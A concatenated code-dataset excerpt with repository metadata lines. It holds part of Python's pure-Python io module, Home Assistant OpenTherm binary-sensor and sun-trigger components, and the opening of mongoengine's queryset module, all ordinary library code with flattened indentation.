buffer_size=DEFAULT_BUFFER_SIZE, max_buffer_size=None):
raw._checkSeekable()
BufferedReader.__init__(self, raw, buffer_size)
BufferedWriter.__init__(self, raw, buffer_size, max_buffer_size)
def seek(self, pos, whence=0):
if not (0 <= whence <= 2):
raise ValueError("invalid whence")
self.flush()
if self._read_buf:
# Undo read ahead.
with self._read_lock:
self.raw.seek(self._read_pos - len(self._read_buf), 1)
# First do the raw seek, then empty the read buffer, so that
# if the raw seek fails, we don't lose buffered data forever.
pos = self.raw.seek(pos, whence)
with self._read_lock:
self._reset_read_buf()
if pos < 0:
raise IOError("seek() returned invalid position")
return pos
def tell(self):
if self._write_buf:
return BufferedWriter.tell(self)
else:
return BufferedReader.tell(self)
def truncate(self, pos=None):
if pos is None:
pos = self.tell()
# Use seek to flush the read buffer.
return BufferedWriter.truncate(self, pos)
def read(self, n=None):
if n is None:
n = -1
self.flush()
return BufferedReader.read(self, n)
def readinto(self, b):
self.flush()
return BufferedReader.readinto(self, b)
def peek(self, n=0):
self.flush()
return BufferedReader.peek(self, n)
def read1(self, n):
self.flush()
return BufferedReader.read1(self, n)
def write(self, b):
if self._read_buf:
# Undo readahead
with self._read_lock:
self.raw.seek(self._read_pos - len(self._read_buf), 1)
self._reset_read_buf()
return BufferedWriter.write(self, b)
class TextIOBase(IOBase):
"""Base class for text I/O.
This class provides a character and line based interface to stream
I/O. There is no readinto method because Python's character strings
are immutable. There is no public constructor.
"""
def read(self, n=-1):
"""Read at most n characters from stream, where n is an int.
Read from underlying buffer until we have n characters or we hit EOF.
If n is negative or omitted, read until EOF.
Returns a string.
"""
self._unsupported("read")
def write(self, s):
"""Write string s to stream and returning an int."""
self._unsupported("write")
def truncate(self, pos=None):
"""Truncate size to pos, where pos is an int."""
self._unsupported("truncate")
def readline(self):
"""Read until newline or EOF.
Returns an empty string if EOF is hit immediately.
"""
self._unsupported("readline")
def detach(self):
"""
Separate the underlying buffer from the TextIOBase and return it.
After the underlying buffer has been detached, the TextIO is in an
unusable state.
"""
self._unsupported("detach")
@property
def encoding(self):
"""Subclasses should override."""
return None
@property
def newlines(self):
"""Line endings translated so far.
Only line endings translated during reading are considered.
Subclasses should override.
"""
return None
@property
def errors(self):
"""Error setting of the decoder or encoder.
Subclasses should override."""
return None
io.TextIOBase.register(TextIOBase)
class IncrementalNewlineDecoder(codecs.IncrementalDecoder):
r"""Codec used when reading a file in universal newlines mode. It wraps
another incremental decoder, translating \r\n and \r into \n. It also
records the types of newlines encountered. When used with
translate=False, it ensures that the newline sequence is returned in
one piece.
"""
def __init__(self, decoder, translate, errors='strict'):
codecs.IncrementalDecoder.__init__(self, errors=errors)
self.translate = translate
self.decoder = decoder
self.seennl = 0
self.pendingcr = False
def decode(self, input, final=False):
# decode input (with the eventual \r from a previous pass)
if self.decoder is None:
output = input
else:
output = self.decoder.decode(input, final=final)
if self.pendingcr and (output or final):
output = "\r" + output
self.pendingcr = False
# retain last \r even when not translating data:
# then readline() is sure to get \r\n in one pass
if output.endswith("\r") and not final:
output = output[:-1]
self.pendingcr = True
# Record which newlines are read
crlf = output.count('\r\n')
cr = output.count('\r') - crlf
lf = output.count('\n') - crlf
self.seennl |= (lf and self._LF) | (cr and self._CR) \
| (crlf and self._CRLF)
if self.translate:
if crlf:
output = output.replace("\r\n", "\n")
if cr:
output = output.replace("\r", "\n")
return output
def getstate(self):
if self.decoder is None:
buf = b""
flag = 0
else:
buf, flag = self.decoder.getstate()
flag <<= 1
if self.pendingcr:
flag |= 1
return buf, flag
def setstate(self, state):
buf, flag = state
self.pendingcr = bool(flag & 1)
if self.decoder is not None:
self.decoder.setstate((buf, flag >> 1))
def reset(self):
self.seennl = 0
self.pendingcr = False
if self.decoder is not None:
self.decoder.reset()
_LF = 1
_CR = 2
_CRLF = 4
@property
def newlines(self):
return (None,
"\n",
"\r",
("\r", "\n"),
"\r\n",
("\n", "\r\n"),
("\r", "\r\n"),
("\r", "\n", "\r\n")
)[self.seennl]
class TextIOWrapper(TextIOBase):
r"""Character and line based layer over a BufferedIOBase object, buffer.
encoding gives the name of the encoding that the stream will be
decoded or encoded with. It defaults to locale.getpreferredencoding.
errors determines the strictness of encoding and decoding (see the
codecs.register) and defaults to "strict".
newline can be None, '', '\n', '\r', or '\r\n'. It controls the
handling of line endings. If it is None, universal newlines is
    enabled. With this enabled, on input, the line endings '\n', '\r',
or '\r\n' are translated to '\n' before being returned to the
caller. Conversely, on output, '\n' is translated to the system
    default line separator, os.linesep. If newline is any other of its
legal values, that newline becomes the newline when the file is read
and it is returned untranslated. On output, '\n' is converted to the
newline.
If line_buffering is True, a call to flush is implied when a call to
write contains a newline character.
"""
_CHUNK_SIZE = 2048
def __init__(self, buffer, encoding=None, errors=None, newline=None,
line_buffering=False, write_through=False):
if newline is not None and not isinstance(newline, str):
raise TypeError("illegal newline type: %r" % (type(newline),))
if newline not in (None, "", "\n", "\r", "\r\n"):
raise ValueError("illegal newline value: %r" % (newline,))
if encoding is None:
try:
encoding = os.device_encoding(buffer.fileno())
except (AttributeError, UnsupportedOperation):
pass
if encoding is None:
try:
import locale
except ImportError:
# Importing locale may fail if Python is being built
encoding = "ascii"
else:
encoding = locale.getpreferredencoding()
if not isinstance(encoding, str):
raise ValueError("invalid encoding: %r" % encoding)
if errors is None:
errors = "strict"
else:
if not isinstance(errors, str):
raise ValueError("invalid errors: %r" % errors)
self._buffer = buffer
self._line_buffering = line_buffering
self._encoding = encoding
self._errors = errors
self._readuniversal = not newline
self._readtranslate = newline is None
self._readnl = newline
self._writetranslate = newline != ''
self._writenl = newline or os.linesep
self._encoder = None
self._decoder = None
self._decoded_chars = '' # buffer for text returned from decoder
self._decoded_chars_used = 0 # offset into _decoded_chars for read()
self._snapshot = None # info for reconstructing decoder state
self._seekable = self._telling = self.buffer.seekable()
self._has_read1 = hasattr(self.buffer, 'read1')
if self._seekable and self.writable():
position = self.buffer.tell()
if position != 0:
try:
self._get_encoder().setstate(0)
except LookupError:
# Sometimes the encoder doesn't exist
pass
# self._snapshot is either None, or a tuple (dec_flags, next_input)
# where dec_flags is the second (integer) item of the decoder state
# and next_input is the chunk of input bytes that comes next after the
# snapshot point. We use this to reconstruct decoder states in tell().
# Naming convention:
# - "bytes_..." for integer variables that count input bytes
# - "chars_..." for integer variables that count decoded characters
def __repr__(self):
result = "<_pyio.TextIOWrapper"
try:
name = self.name
except AttributeError:
pass
else:
result += " name={0!r}".format(name)
try:
mode = self.mode
except AttributeError:
pass
else:
result += " mode={0!r}".format(mode)
return result + " encoding={0!r}>".format(self.encoding)
@property
def encoding(self):
return self._encoding
@property
def errors(self):
return self._errors
@property
def line_buffering(self):
return self._line_buffering
@property
def buffer(self):
return self._buffer
def seekable(self):
return self._seekable
def readable(self):
return self.buffer.readable()
def writable(self):
return self.buffer.writable()
def flush(self):
self.buffer.flush()
self._telling = self._seekable
def close(self):
if self.buffer is not None and not self.closed:
self.flush()
self.buffer.close()
@property
def closed(self):
return self.buffer.closed
@property
def name(self):
return self.buffer.name
def fileno(self):
return self.buffer.fileno()
def isatty(self):
return self.buffer.isatty()
def write(self, s):
'Write data, where s is a str'
if self.closed:
raise ValueError("write to closed file")
if not isinstance(s, str):
raise TypeError("can't write %s to text stream" %
s.__class__.__name__)
length = len(s)
haslf = (self._writetranslate or self._line_buffering) and "\n" in s
if haslf and self._writetranslate and self._writenl != "\n":
s = s.replace("\n", self._writenl)
encoder = self._encoder or self._get_encoder()
# XXX What if we were just reading?
b = encoder.encode(s)
self.buffer.write(b)
if self._line_buffering and (haslf or "\r" in s):
self.flush()
self._snapshot = None
if self._decoder:
self._decoder.reset()
return length
def _get_encoder(self):
make_encoder = codecs.getincrementalencoder(self._encoding)
self._encoder = make_encoder(self._errors)
return self._encoder
def _get_decoder(self):
make_decoder = codecs.getincrementaldecoder(self._encoding)
decoder = make_decoder(self._errors)
if self._readuniversal:
decoder = IncrementalNewlineDecoder(decoder, self._readtranslate)
self._decoder = decoder
return decoder
# The following three methods implement an ADT for _decoded_chars.
# Text returned from the decoder is buffered here until the client
# requests it by calling our read() or readline() method.
def _set_decoded_chars(self, chars):
"""Set the _decoded_chars buffer."""
self._decoded_chars = chars
self._decoded_chars_used = 0
def _get_decoded_chars(self, n=None):
"""Advance into the _decoded_chars buffer."""
offset = self._decoded_chars_used
if n is None:
chars = self._decoded_chars[offset:]
else:
chars = self._decoded_chars[offset:offset + n]
self._decoded_chars_used += len(chars)
return chars
def _rewind_decoded_chars(self, n):
"""Rewind the _decoded_chars buffer."""
if self._decoded_chars_used < n:
raise AssertionError("rewind decoded_chars out of bounds")
self._decoded_chars_used -= n
def _read_chunk(self):
"""
Read and decode the next chunk of data from the BufferedReader.
"""
# The return value is True unless EOF was reached. The decoded
# string is placed in self._decoded_chars (replacing its previous
# value). The entire input chunk is sent to the decoder, though
# some of it may remain buffered in the decoder, yet to be
# converted.
if self._decoder is None:
raise ValueError("no decoder")
if self._telling:
# To prepare for tell(), we need to snapshot a point in the
# file where the decoder's input buffer is empty.
dec_buffer, dec_flags = self._decoder.getstate()
# Given this, we know there was a valid snapshot point
# len(dec_buffer) bytes ago with decoder state (b'', dec_flags).
# Read a chunk, decode it, and put the result in self._decoded_chars.
if self._has_read1:
input_chunk = self.buffer.read1(self._CHUNK_SIZE)
else:
input_chunk = self.buffer.read(self._CHUNK_SIZE)
eof = not input_chunk
self._set_decoded_chars(self._decoder.decode(input_chunk, eof))
if self._telling:
# At the snapshot point, len(dec_buffer) bytes before the read,
# the next input to be decoded is dec_buffer + input_chunk.
self._snapshot = (dec_flags, dec_buffer + input_chunk)
return not eof
def _pack_cookie(self, position, dec_flags=0,
bytes_to_feed=0, need_eof=0, chars_to_skip=0):
# The meaning of a tell() cookie is: seek to position, set the
# decoder flags to dec_flags, read bytes_to_feed bytes, feed them
# into the decoder with need_eof as the EOF flag, then skip
# chars_to_skip characters of the decoded result. For most simple
# decoders, tell() will often just give a byte offset in the file.
return (position | (dec_flags<<64) | (bytes_to_feed<<128) |
(chars_to_skip<<192) | bool(need_eof)<<256)
def _unpack_cookie(self, bigint):
rest, position = divmod(bigint, 1<<64)
rest, dec_flags = divmod(rest, 1<<64)
rest, bytes_to_feed = divmod(rest, 1<<64)
need_eof, chars_to_skip = divmod(rest, 1<<64)
return position, dec_flags, bytes_to_feed, need_eof, chars_to_skip
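# Worked example (editorial sketch, derivable from the packing above): each
# field occupies its own 64-bit slot, so _pack_cookie(10, dec_flags=1) equals
# 10 + (1 << 64), and feeding that value back to _unpack_cookie() yields
# (10, 1, 0, 0, 0), i.e. position, dec_flags, bytes_to_feed, need_eof and
# chars_to_skip in that order.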
def tell(self):
if not self._seekable:
raise UnsupportedOperation("underlying stream is not seekable")
if not self._telling:
raise IOError("telling position disabled by next() call")
self.flush()
position = self.buffer.tell()
decoder = self._decoder
if decoder is None or self._snapshot is None:
if self._decoded_chars:
# This should never happen.
raise AssertionError("pending decoded text")
return position
# Skip backward to the snapshot point (see _read_chunk).
dec_flags, next_input = self._snapshot
position -= len(next_input)
# How many decoded characters have been used up since the snapshot?
chars_to_skip = self._decoded_chars_used
if chars_to_skip == 0:
# We haven't moved from the snapshot point.
return self._pack_cookie(position, dec_flags)
# Starting from the snapshot position, we will walk the decoder
# forward until it gives us enough decoded characters.
saved_state = decoder.getstate()
try:
# Note our initial start point.
decoder.setstate((b'', dec_flags))
start_pos = position
start_flags, bytes_fed, chars_decoded = dec_flags, 0, 0
need_eof = 0
# Feed the decoder one byte at a time. As we go, note the
# nearest "safe start point" before the current location
# (a point where the decoder has nothing buffered, so seek()
# can safely start from there and advance to this location).
next_byte = bytearray(1)
for next_byte[0] in next_input:
bytes_fed += 1
chars_decoded += len(decoder.decode(next_byte))
dec_buffer, dec_flags = decoder.getstate()
if not dec_buffer and chars_decoded <= chars_to_skip:
# Decoder buffer is empty, so this is a safe start point.
start_pos += bytes_fed
chars_to_skip -= chars_decoded
start_flags, bytes_fed, chars_decoded = dec_flags, 0, 0
if chars_decoded >= chars_to_skip:
break
else:
# We didn't get enough decoded data; signal EOF to get more.
chars_decoded += len(decoder.decode(b'', final=True))
need_eof = 1
if chars_decoded < chars_to_skip:
raise IOError("can't reconstruct logical file position")
# The returned cookie corresponds to the last safe start point.
return self._pack_cookie(
start_pos, start_flags, bytes_fed, need_eof, chars_to_skip)
finally:
decoder.setstate(saved_state)
def truncate(self, pos=None):
self.flush()
if pos is None:
pos = self.tell()
return self.buffer.truncate(pos)
def detach(self):
if self.buffer is None:
raise ValueError("buffer is already detached")
self.flush()
buffer = self._buffer
self._buffer = None
return buffer
def seek(self, cookie, whence=0):
if self.closed:
raise ValueError("tell on closed file")
if not self._seekable:
raise UnsupportedOperation("underlying stream is not seekable")
if whence == 1: # seek relative to current position
if cookie != 0:
raise UnsupportedOperation("can't do nonzero cur-relative seeks")
# Seeking to the current position should attempt to
# sync the underlying buffer with the current position.
whence = 0
cookie = self.tell()
if whence == 2: # seek relative to end of file
if cookie != 0:
raise UnsupportedOperation("can't do nonzero end-relative seeks")
self.flush()
position = self.buffer.seek(0, 2)
self._set_decoded_chars('')
self._snapshot = None
if self._decoder:
self._decoder.reset()
return position
if whence != 0:
raise ValueError("invalid whence (%r, should be 0, 1 or 2)" %
(whence,))
if cookie < 0:
raise ValueError("negative seek position %r" % (cookie,))
self.flush()
# The strategy of seek() is to go back to the safe start point
# and replay the effect of read(chars_to_skip) from there.
start_pos, dec_flags, bytes_to_feed, need_eof, chars_to_skip = \
self._unpack_cookie(cookie)
# Seek back to the safe start point.
self.buffer.seek(start_pos)
self._set_decoded_chars('')
self._snapshot = None
# Restore the decoder to its state from the safe start point.
if cookie == 0 and self._decoder:
self._decoder.reset()
elif self._decoder or dec_flags or chars_to_skip:
self._decoder = self._decoder or self._get_decoder()
self._decoder.setstate((b'', dec_flags))
self._snapshot = (dec_flags, b'')
if chars_to_skip:
# Just like _read_chunk, feed the decoder and save a snapshot.
input_chunk = self.buffer.read(bytes_to_feed)
self._set_decoded_chars(
self._decoder.decode(input_chunk, need_eof))
self._snapshot = (dec_flags, input_chunk)
# Skip chars_to_skip of the decoded characters.
if len(self._decoded_chars) < chars_to_skip:
raise IOError("can't restore logical file position")
self._decoded_chars_used = chars_to_skip
# Finally, reset the encoder (merely useful for proper BOM handling)
try:
encoder = self._encoder or self._get_encoder()
except LookupError:
# Sometimes the encoder doesn't exist
pass
else:
if cookie != 0:
encoder.setstate(0)
else:
encoder.reset()
return cookie
def read(self, n=None):
self._checkReadable()
if n is None:
n = -1
decoder = self._decoder or self._get_decoder()
try:
n.__index__
except AttributeError as err:
raise TypeError("an integer is required") from err
if n < 0:
# Read everything.
result = (self._get_decoded_chars() +
decoder.decode(self.buffer.read(), final=True))
self._set_decoded_chars('')
self._snapshot = None
return result
else:
# Keep reading chunks until we have n characters to return.
eof = False
result = self._get_decoded_chars(n)
while len(result) < n and not eof:
eof = not self._read_chunk()
result += self._get_decoded_chars(n - len(result))
return result
def __next__(self):
self._telling = False
line = self.readline()
if not line:
self._snapshot = None
self._telling = self._seekable
raise StopIteration
return line
def readline(self, limit=None):
if self.closed:
raise ValueError("read from closed file")
if limit is None:
limit = -1
elif not isinstance(limit, int):
raise TypeError("limit must be an integer")
# Grab all the decoded text (we will rewind any extra bits later).
line = self._get_decoded_chars()
start = 0
# Make the decoder if it doesn't already exist.
if not self._decoder:
self._get_decoder()
pos = endpos = None
while True:
if self._readtranslate:
# Newlines are already translated, only search for \n
pos = line.find('\n', start)
if pos >= 0:
endpos = pos + 1
break
else:
start = len(line)
elif self._readuniversal:
# Universal newline search. Find any of \r, \r\n, \n
# The decoder ensures that \r\n are not split in two pieces
# In C we'd look for these in parallel of course.
nlpos = line.find("\n", start)
crpos = line.find("\r", start)
if crpos == -1:
if nlpos == -1:
# Nothing found
start = len(line)
else:
# Found \n
endpos = nlpos + 1
break
elif nlpos == -1:
# Found lone \r
endpos = crpos + 1
break
elif nlpos < crpos:
# Found \n
endpos = nlpos + 1
break
elif nlpos == crpos + 1:
# Found \r\n
endpos = crpos + 2
break
else:
# Found \r
endpos = crpos + 1
break
else:
# non-universal
pos = line.find(self._readnl)
if pos >= 0:
endpos = pos + len(self._readnl)
break
if limit >= 0 and len(line) >= limit:
endpos = limit # reached length limit
break
# No line ending seen yet - get more data
while self._read_chunk():
if self._decoded_chars:
break
if self._decoded_chars:
line += self._get_decoded_chars()
else:
# end of file
self._set_decoded_chars('')
self._snapshot = None
return line
if limit >= 0 and endpos > limit:
endpos = limit # don't exceed limit
# Rewind _decoded_chars to just after the line ending we found.
self._rewind_decoded_chars(len(line) - endpos)
return line[:endpos]
@property
def newlines(self):
return self._decoder.newlines if self._decoder else None
class StringIO(TextIOWrapper):
"""Text I/O implementation using an in-memory buffer.
The initial_value argument sets the value of the object. The newline
argument is like the one of TextIOWrapper's constructor.
"""
def __init__(self, initial_value="", newline="\n"):
super(StringIO, self).__init__(BytesIO(),
encoding="utf-8",
errors="strict",
newline=newline)
# Issue #5645: make universal newlines semantics the same as in the
# C version, even under Windows.
if newline is None:
self._writetranslate = False
if initial_value is not None:
if not isinstance(initial_value, str):
raise TypeError("initial_value must be str or None, not {0}"
.format(type(initial_value).__name__))
initial_value = str(initial_value)
self.write(initial_value)
self.seek(0)
def getvalue(self):
self.flush()
return self.buffer.getvalue().decode(self._encoding, self._errors)
def __repr__(self):
# TextIOWrapper tells the encoding in its repr. In StringIO,
# that's an implementation detail.
return object.__repr__(self)
@property
def errors(self):
return None
@property
def encoding(self):
return None
def detach(self):
# This doesn't make sense on StringIO.
self._unsupported("detach")
|
balloob/home-assistant
|
refs/heads/dev
|
homeassistant/components/opentherm_gw/binary_sensor.py
|
12
|
"""Support for OpenTherm Gateway binary sensors."""
import logging
from homeassistant.components.binary_sensor import ENTITY_ID_FORMAT, BinarySensorEntity
from homeassistant.const import CONF_ID
from homeassistant.core import callback
from homeassistant.helpers.dispatcher import async_dispatcher_connect
from homeassistant.helpers.entity import async_generate_entity_id
from . import DOMAIN
from .const import BINARY_SENSOR_INFO, DATA_GATEWAYS, DATA_OPENTHERM_GW
_LOGGER = logging.getLogger(__name__)
async def async_setup_entry(hass, config_entry, async_add_entities):
"""Set up the OpenTherm Gateway binary sensors."""
sensors = []
for var, info in BINARY_SENSOR_INFO.items():
device_class = info[0]
friendly_name_format = info[1]
sensors.append(
OpenThermBinarySensor(
hass.data[DATA_OPENTHERM_GW][DATA_GATEWAYS][config_entry.data[CONF_ID]],
var,
device_class,
friendly_name_format,
)
)
async_add_entities(sensors)
class OpenThermBinarySensor(BinarySensorEntity):
"""Represent an OpenTherm Gateway binary sensor."""
def __init__(self, gw_dev, var, device_class, friendly_name_format):
"""Initialize the binary sensor."""
self.entity_id = async_generate_entity_id(
ENTITY_ID_FORMAT, f"{var}_{gw_dev.gw_id}", hass=gw_dev.hass
)
self._gateway = gw_dev
self._var = var
self._state = None
self._device_class = device_class
self._friendly_name = friendly_name_format.format(gw_dev.name)
self._unsub_updates = None
async def async_added_to_hass(self):
"""Subscribe to updates from the component."""
_LOGGER.debug("Added OpenTherm Gateway binary sensor %s", self._friendly_name)
self._unsub_updates = async_dispatcher_connect(
self.hass, self._gateway.update_signal, self.receive_report
)
async def async_will_remove_from_hass(self):
"""Unsubscribe from updates from the component."""
_LOGGER.debug(
"Removing OpenTherm Gateway binary sensor %s", self._friendly_name
)
self._unsub_updates()
@property
def available(self):
"""Return availability of the sensor."""
return self._state is not None
@property
def entity_registry_enabled_default(self):
"""Disable binary_sensors by default."""
return False
@callback
def receive_report(self, status):
"""Handle status updates from the component."""
state = status.get(self._var)
self._state = None if state is None else bool(state)
self.async_write_ha_state()
@property
def name(self):
"""Return the friendly name."""
return self._friendly_name
@property
def device_info(self):
"""Return device info."""
return {
"identifiers": {(DOMAIN, self._gateway.gw_id)},
"name": self._gateway.name,
"manufacturer": "Schelte Bron",
"model": "OpenTherm Gateway",
"sw_version": self._gateway.gw_version,
}
@property
def unique_id(self):
"""Return a unique ID."""
return f"{self._gateway.gw_id}-{self._var}"
@property
def is_on(self):
"""Return true if the binary sensor is on."""
return self._state
@property
def device_class(self):
"""Return the class of this device."""
return self._device_class
@property
def should_poll(self):
"""Return False because entity pushes its state."""
return False
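# Editorial note (an assumption about typical use, not part of the
# integration): receive_report() maps the gateway status dict onto this
# entity, so a status value of 1 for this sensor's variable turns it on,
# 0 turns it off, and a missing key resets the state to None, which also
# makes the entity report itself as unavailable.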
|
hexxter/home-assistant
|
refs/heads/dev
|
homeassistant/components/automation/sun.py
|
19
|
"""
Offer sun based automation rules.
For more details about this automation rule, please refer to the documentation
at https://home-assistant.io/components/automation/#sun-trigger
"""
from datetime import timedelta
import logging
import voluptuous as vol
from homeassistant.core import callback
from homeassistant.const import (
CONF_EVENT, CONF_OFFSET, CONF_PLATFORM, SUN_EVENT_SUNRISE)
from homeassistant.helpers.event import async_track_sunrise, async_track_sunset
import homeassistant.helpers.config_validation as cv
DEPENDENCIES = ['sun']
_LOGGER = logging.getLogger(__name__)
TRIGGER_SCHEMA = vol.Schema({
vol.Required(CONF_PLATFORM): 'sun',
vol.Required(CONF_EVENT): cv.sun_event,
vol.Required(CONF_OFFSET, default=timedelta(0)): cv.time_period,
})
def async_trigger(hass, config, action):
"""Listen for events based on configuration."""
event = config.get(CONF_EVENT)
offset = config.get(CONF_OFFSET)
@callback
def call_action():
"""Call action with right context."""
hass.async_run_job(action, {
'trigger': {
'platform': 'sun',
'event': event,
'offset': offset,
},
})
# Do something to call action
if event == SUN_EVENT_SUNRISE:
return async_track_sunrise(hass, call_action, offset)
else:
return async_track_sunset(hass, call_action, offset)
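# A minimal validation sketch (editorial addition; assumes Home Assistant is
# installed so the imports above resolve): TRIGGER_SCHEMA normalises a raw
# trigger config before async_trigger() is called with it.
if __name__ == "__main__":
    conf = TRIGGER_SCHEMA({
        CONF_PLATFORM: 'sun',
        CONF_EVENT: 'sunset',
        CONF_OFFSET: timedelta(minutes=-30),
    })
    # The validated config is what async_trigger() receives.
    assert conf[CONF_EVENT] == 'sunset'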
|
colinhowe/mongoengine
|
refs/heads/master
|
mongoengine/queryset.py
|
2
|
import pprint
import re
import copy
import itertools
import operator
import pymongo
from bson.code import Code
from mongoengine import signals
__all__ = ['queryset_manager', 'Q', 'InvalidQueryError',
'DO_NOTHING', 'NULLIFY', 'CASCADE', 'DENY']
# The maximum number of items to display in a QuerySet.__repr__
REPR_OUTPUT_SIZE = 20
# Delete rules
DO_NOTHING = 0
NULLIFY = 1
CASCADE = 2
DENY = 3
class DoesNotExist(Exception):
pass
class MultipleObjectsReturned(Exception):
pass
class InvalidQueryError(Exception):
pass
class OperationError(Exception):
pass
RE_TYPE = type(re.compile(''))
class QNodeVisitor(object):
"""Base visitor class for visiting Q-object nodes in a query tree.
"""
def visit_combination(self, combination):
"""Called by QCombination objects.
"""
return combination
def visit_query(self, query):
"""Called by (New)Q objects.
"""
return query
class SimplificationVisitor(QNodeVisitor):
"""Simplifies query trees by combinging unnecessary 'and' connection nodes
into a single Q-object.
"""
def visit_combination(self, combination):
if combination.operation == combination.AND:
# The simplification only applies to 'simple' queries
if all(isinstance(node, Q) for node in combination.children):
queries = [node.query for node in combination.children]
return Q(**self._query_conjunction(queries))
return combination
def _query_conjunction(self, queries):
"""Merges query dicts - effectively &ing them together.
"""
query_ops = set()
combined_query = {}
for query in queries:
ops = set(query.keys())
# Make sure that the same operation isn't applied more than once
# to a single field
intersection = ops.intersection(query_ops)
if intersection:
msg = 'Duplicate query conditions: '
raise InvalidQueryError(msg + ', '.join(intersection))
query_ops.update(ops)
combined_query.update(copy.deepcopy(query))
return combined_query
class QueryTreeTransformerVisitor(QNodeVisitor):
"""Transforms the query tree in to a form that may be used with MongoDB.
"""
def visit_combination(self, combination):
if combination.operation == combination.AND:
# MongoDB doesn't allow us to have too many $or operations in our
# queries, so the aim is to move the ORs up the tree to one
# 'master' $or. Firstly, we must find all the necessary parts (part
# of an AND combination or just standard Q object), and store them
# separately from the OR parts.
or_groups = []
and_parts = []
for node in combination.children:
if isinstance(node, QCombination):
if node.operation == node.OR:
# Any of the children in an $or component may cause
# the query to succeed
or_groups.append(node.children)
elif node.operation == node.AND:
and_parts.append(node)
elif isinstance(node, Q):
and_parts.append(node)
# Now we combine the parts into a usable query. AND together all of
# the necessary parts. Then for each $or part, create a new query
# that ANDs the necessary part with the $or part.
clauses = []
for or_group in itertools.product(*or_groups):
q_object = reduce(lambda a, b: a & b, and_parts, Q())
q_object = reduce(lambda a, b: a & b, or_group, q_object)
clauses.append(q_object)
# Finally, $or the generated clauses into one query. Each of the
# clauses is sufficient for the query to succeed.
return reduce(lambda a, b: a | b, clauses, Q())
if combination.operation == combination.OR:
children = []
# Crush any nested ORs into this combination as MongoDB doesn't
# support nested $or operations
for node in combination.children:
if (isinstance(node, QCombination) and
node.operation == combination.OR):
children += node.children
else:
children.append(node)
combination.children = children
return combination
class QueryCompilerVisitor(QNodeVisitor):
"""Compiles the nodes in a query tree to a PyMongo-compatible query
dictionary.
"""
def __init__(self, document):
self.document = document
def visit_combination(self, combination):
if combination.operation == combination.OR:
return {'$or': combination.children}
elif combination.operation == combination.AND:
return self._mongo_query_conjunction(combination.children)
return combination
def visit_query(self, query):
return QuerySet._transform_query(self.document, **query.query)
def _mongo_query_conjunction(self, queries):
"""Merges Mongo query dicts - effectively &ing them together.
"""
combined_query = {}
for query in queries:
for field, ops in query.items():
if field not in combined_query:
combined_query[field] = ops
else:
# The field is already present in the query; the only way
# we can merge is if both the existing value and the new
# value are operation dicts. Reject anything else.
if (not isinstance(combined_query[field], dict) or
not isinstance(ops, dict)):
message = 'Conflicting values for ' + field
raise InvalidQueryError(message)
current_ops = set(combined_query[field].keys())
new_ops = set(ops.keys())
# Make sure that the same operation isn't applied more than
# once to a single field
intersection = current_ops.intersection(new_ops)
if intersection:
msg = 'Duplicate query conditions: '
raise InvalidQueryError(msg + ', '.join(intersection))
# Right! We've got two non-overlapping dicts of operations!
combined_query[field].update(copy.deepcopy(ops))
return combined_query
class QNode(object):
"""Base class for nodes in query trees.
"""
AND = 0
OR = 1
def to_query(self, document):
query = self.accept(SimplificationVisitor())
query = query.accept(QueryTreeTransformerVisitor())
query = query.accept(QueryCompilerVisitor(document))
return query
def accept(self, visitor):
raise NotImplementedError
def _combine(self, other, operation):
"""Combine this node with another node into a QCombination object.
"""
if other.empty:
return self
if self.empty:
return other
return QCombination(operation, [self, other])
@property
def empty(self):
return False
def __or__(self, other):
return self._combine(other, self.OR)
def __and__(self, other):
return self._combine(other, self.AND)
class QCombination(QNode):
"""Represents the combination of several conditions by a given logical
operator.
"""
def __init__(self, operation, children):
self.operation = operation
self.children = []
for node in children:
# If the child is a combination of the same type, we can merge its
# children directly into this combinations children
if isinstance(node, QCombination) and node.operation == operation:
self.children += node.children
else:
self.children.append(node)
def accept(self, visitor):
for i in range(len(self.children)):
if isinstance(self.children[i], QNode):
self.children[i] = self.children[i].accept(visitor)
return visitor.visit_combination(self)
@property
def empty(self):
return not bool(self.children)
class Q(QNode):
"""A simple query object, used in a query tree to build up more complex
query structures.
"""
def __init__(self, **query):
self.query = query
def accept(self, visitor):
return visitor.visit_query(self)
@property
def empty(self):
return not bool(self.query)
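# Editorial sketch of how these nodes are used (an assumption about typical
# usage, not executed here): Q objects combine with & and | into QCombination
# trees, and to_query() simplifies, transforms and compiles the tree into a
# PyMongo dict.  For a document class User, something like
#
#     (Q(age__gte=18) & Q(country='uk')) | Q(admin=True)
#
# compiles, via QueryCompilerVisitor, to a query of the form
#
#     {'$or': [{'age': {'$gte': 18}, 'country': 'uk'}, {'admin': True}]}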
class QueryFieldList(object):
"""Object that handles combinations of .only() and .exclude() calls"""
ONLY = 1
EXCLUDE = 0
def __init__(self, fields=[], value=ONLY, always_include=[]):
self.value = value
self.fields = set(fields)
self.always_include = set(always_include)
self._id = None
def as_dict(self):
field_list = dict((field, self.value) for field in self.fields)
if self._id is not None:
field_list['_id'] = self._id
return field_list
def __add__(self, f):
if not self.fields:
self.fields = f.fields
self.value = f.value
elif self.value is self.ONLY and f.value is self.ONLY:
self.fields = self.fields.intersection(f.fields)
elif self.value is self.EXCLUDE and f.value is self.EXCLUDE:
self.fields = self.fields.union(f.fields)
elif self.value is self.ONLY and f.value is self.EXCLUDE:
self.fields -= f.fields
elif self.value is self.EXCLUDE and f.value is self.ONLY:
self.value = self.ONLY
self.fields = f.fields - self.fields
if '_id' in f.fields:
self._id = f.value
if self.always_include:
if self.value is self.ONLY and self.fields:
self.fields = self.fields.union(self.always_include)
else:
self.fields -= self.always_include
return self
def reset(self):
self.fields = set([])
self.value = self.ONLY
def __nonzero__(self):
return bool(self.fields)
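# Editorial sketch (assumption about usage): chained .only()/.exclude() calls
# are merged through __add__, e.g.
#
#     QueryFieldList(['a', 'b'], value=QueryFieldList.ONLY) + \
#         QueryFieldList(['b'], value=QueryFieldList.EXCLUDE)
#
# leaves only {'a'} included: two ONLY lists intersect, two EXCLUDE lists
# union, and an EXCLUDE applied after an ONLY subtracts fields.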
class QuerySet(object):
"""A set of results returned from a query. Wraps a MongoDB cursor,
providing :class:`~mongoengine.Document` objects as the results.
"""
__already_indexed = set()
def __init__(self, document, collection):
self._document = document
self._collection_obj = collection
self._mongo_query = None
self._query_obj = Q()
self._initial_query = {}
self._where_clause = None
self._loaded_fields = QueryFieldList()
self._ordering = []
self._snapshot = False
self._timeout = True
self._class_check = True
self._slave_okay = False
self._read_preference = None
self._scalar = []
# If inheritance is allowed, only return instances and instances of
# subclasses of the class being used
if document._meta.get('allow_inheritance'):
cls_list = document._get_subdocuments() + [document]
cls_list = [c._class_name for c in cls_list]
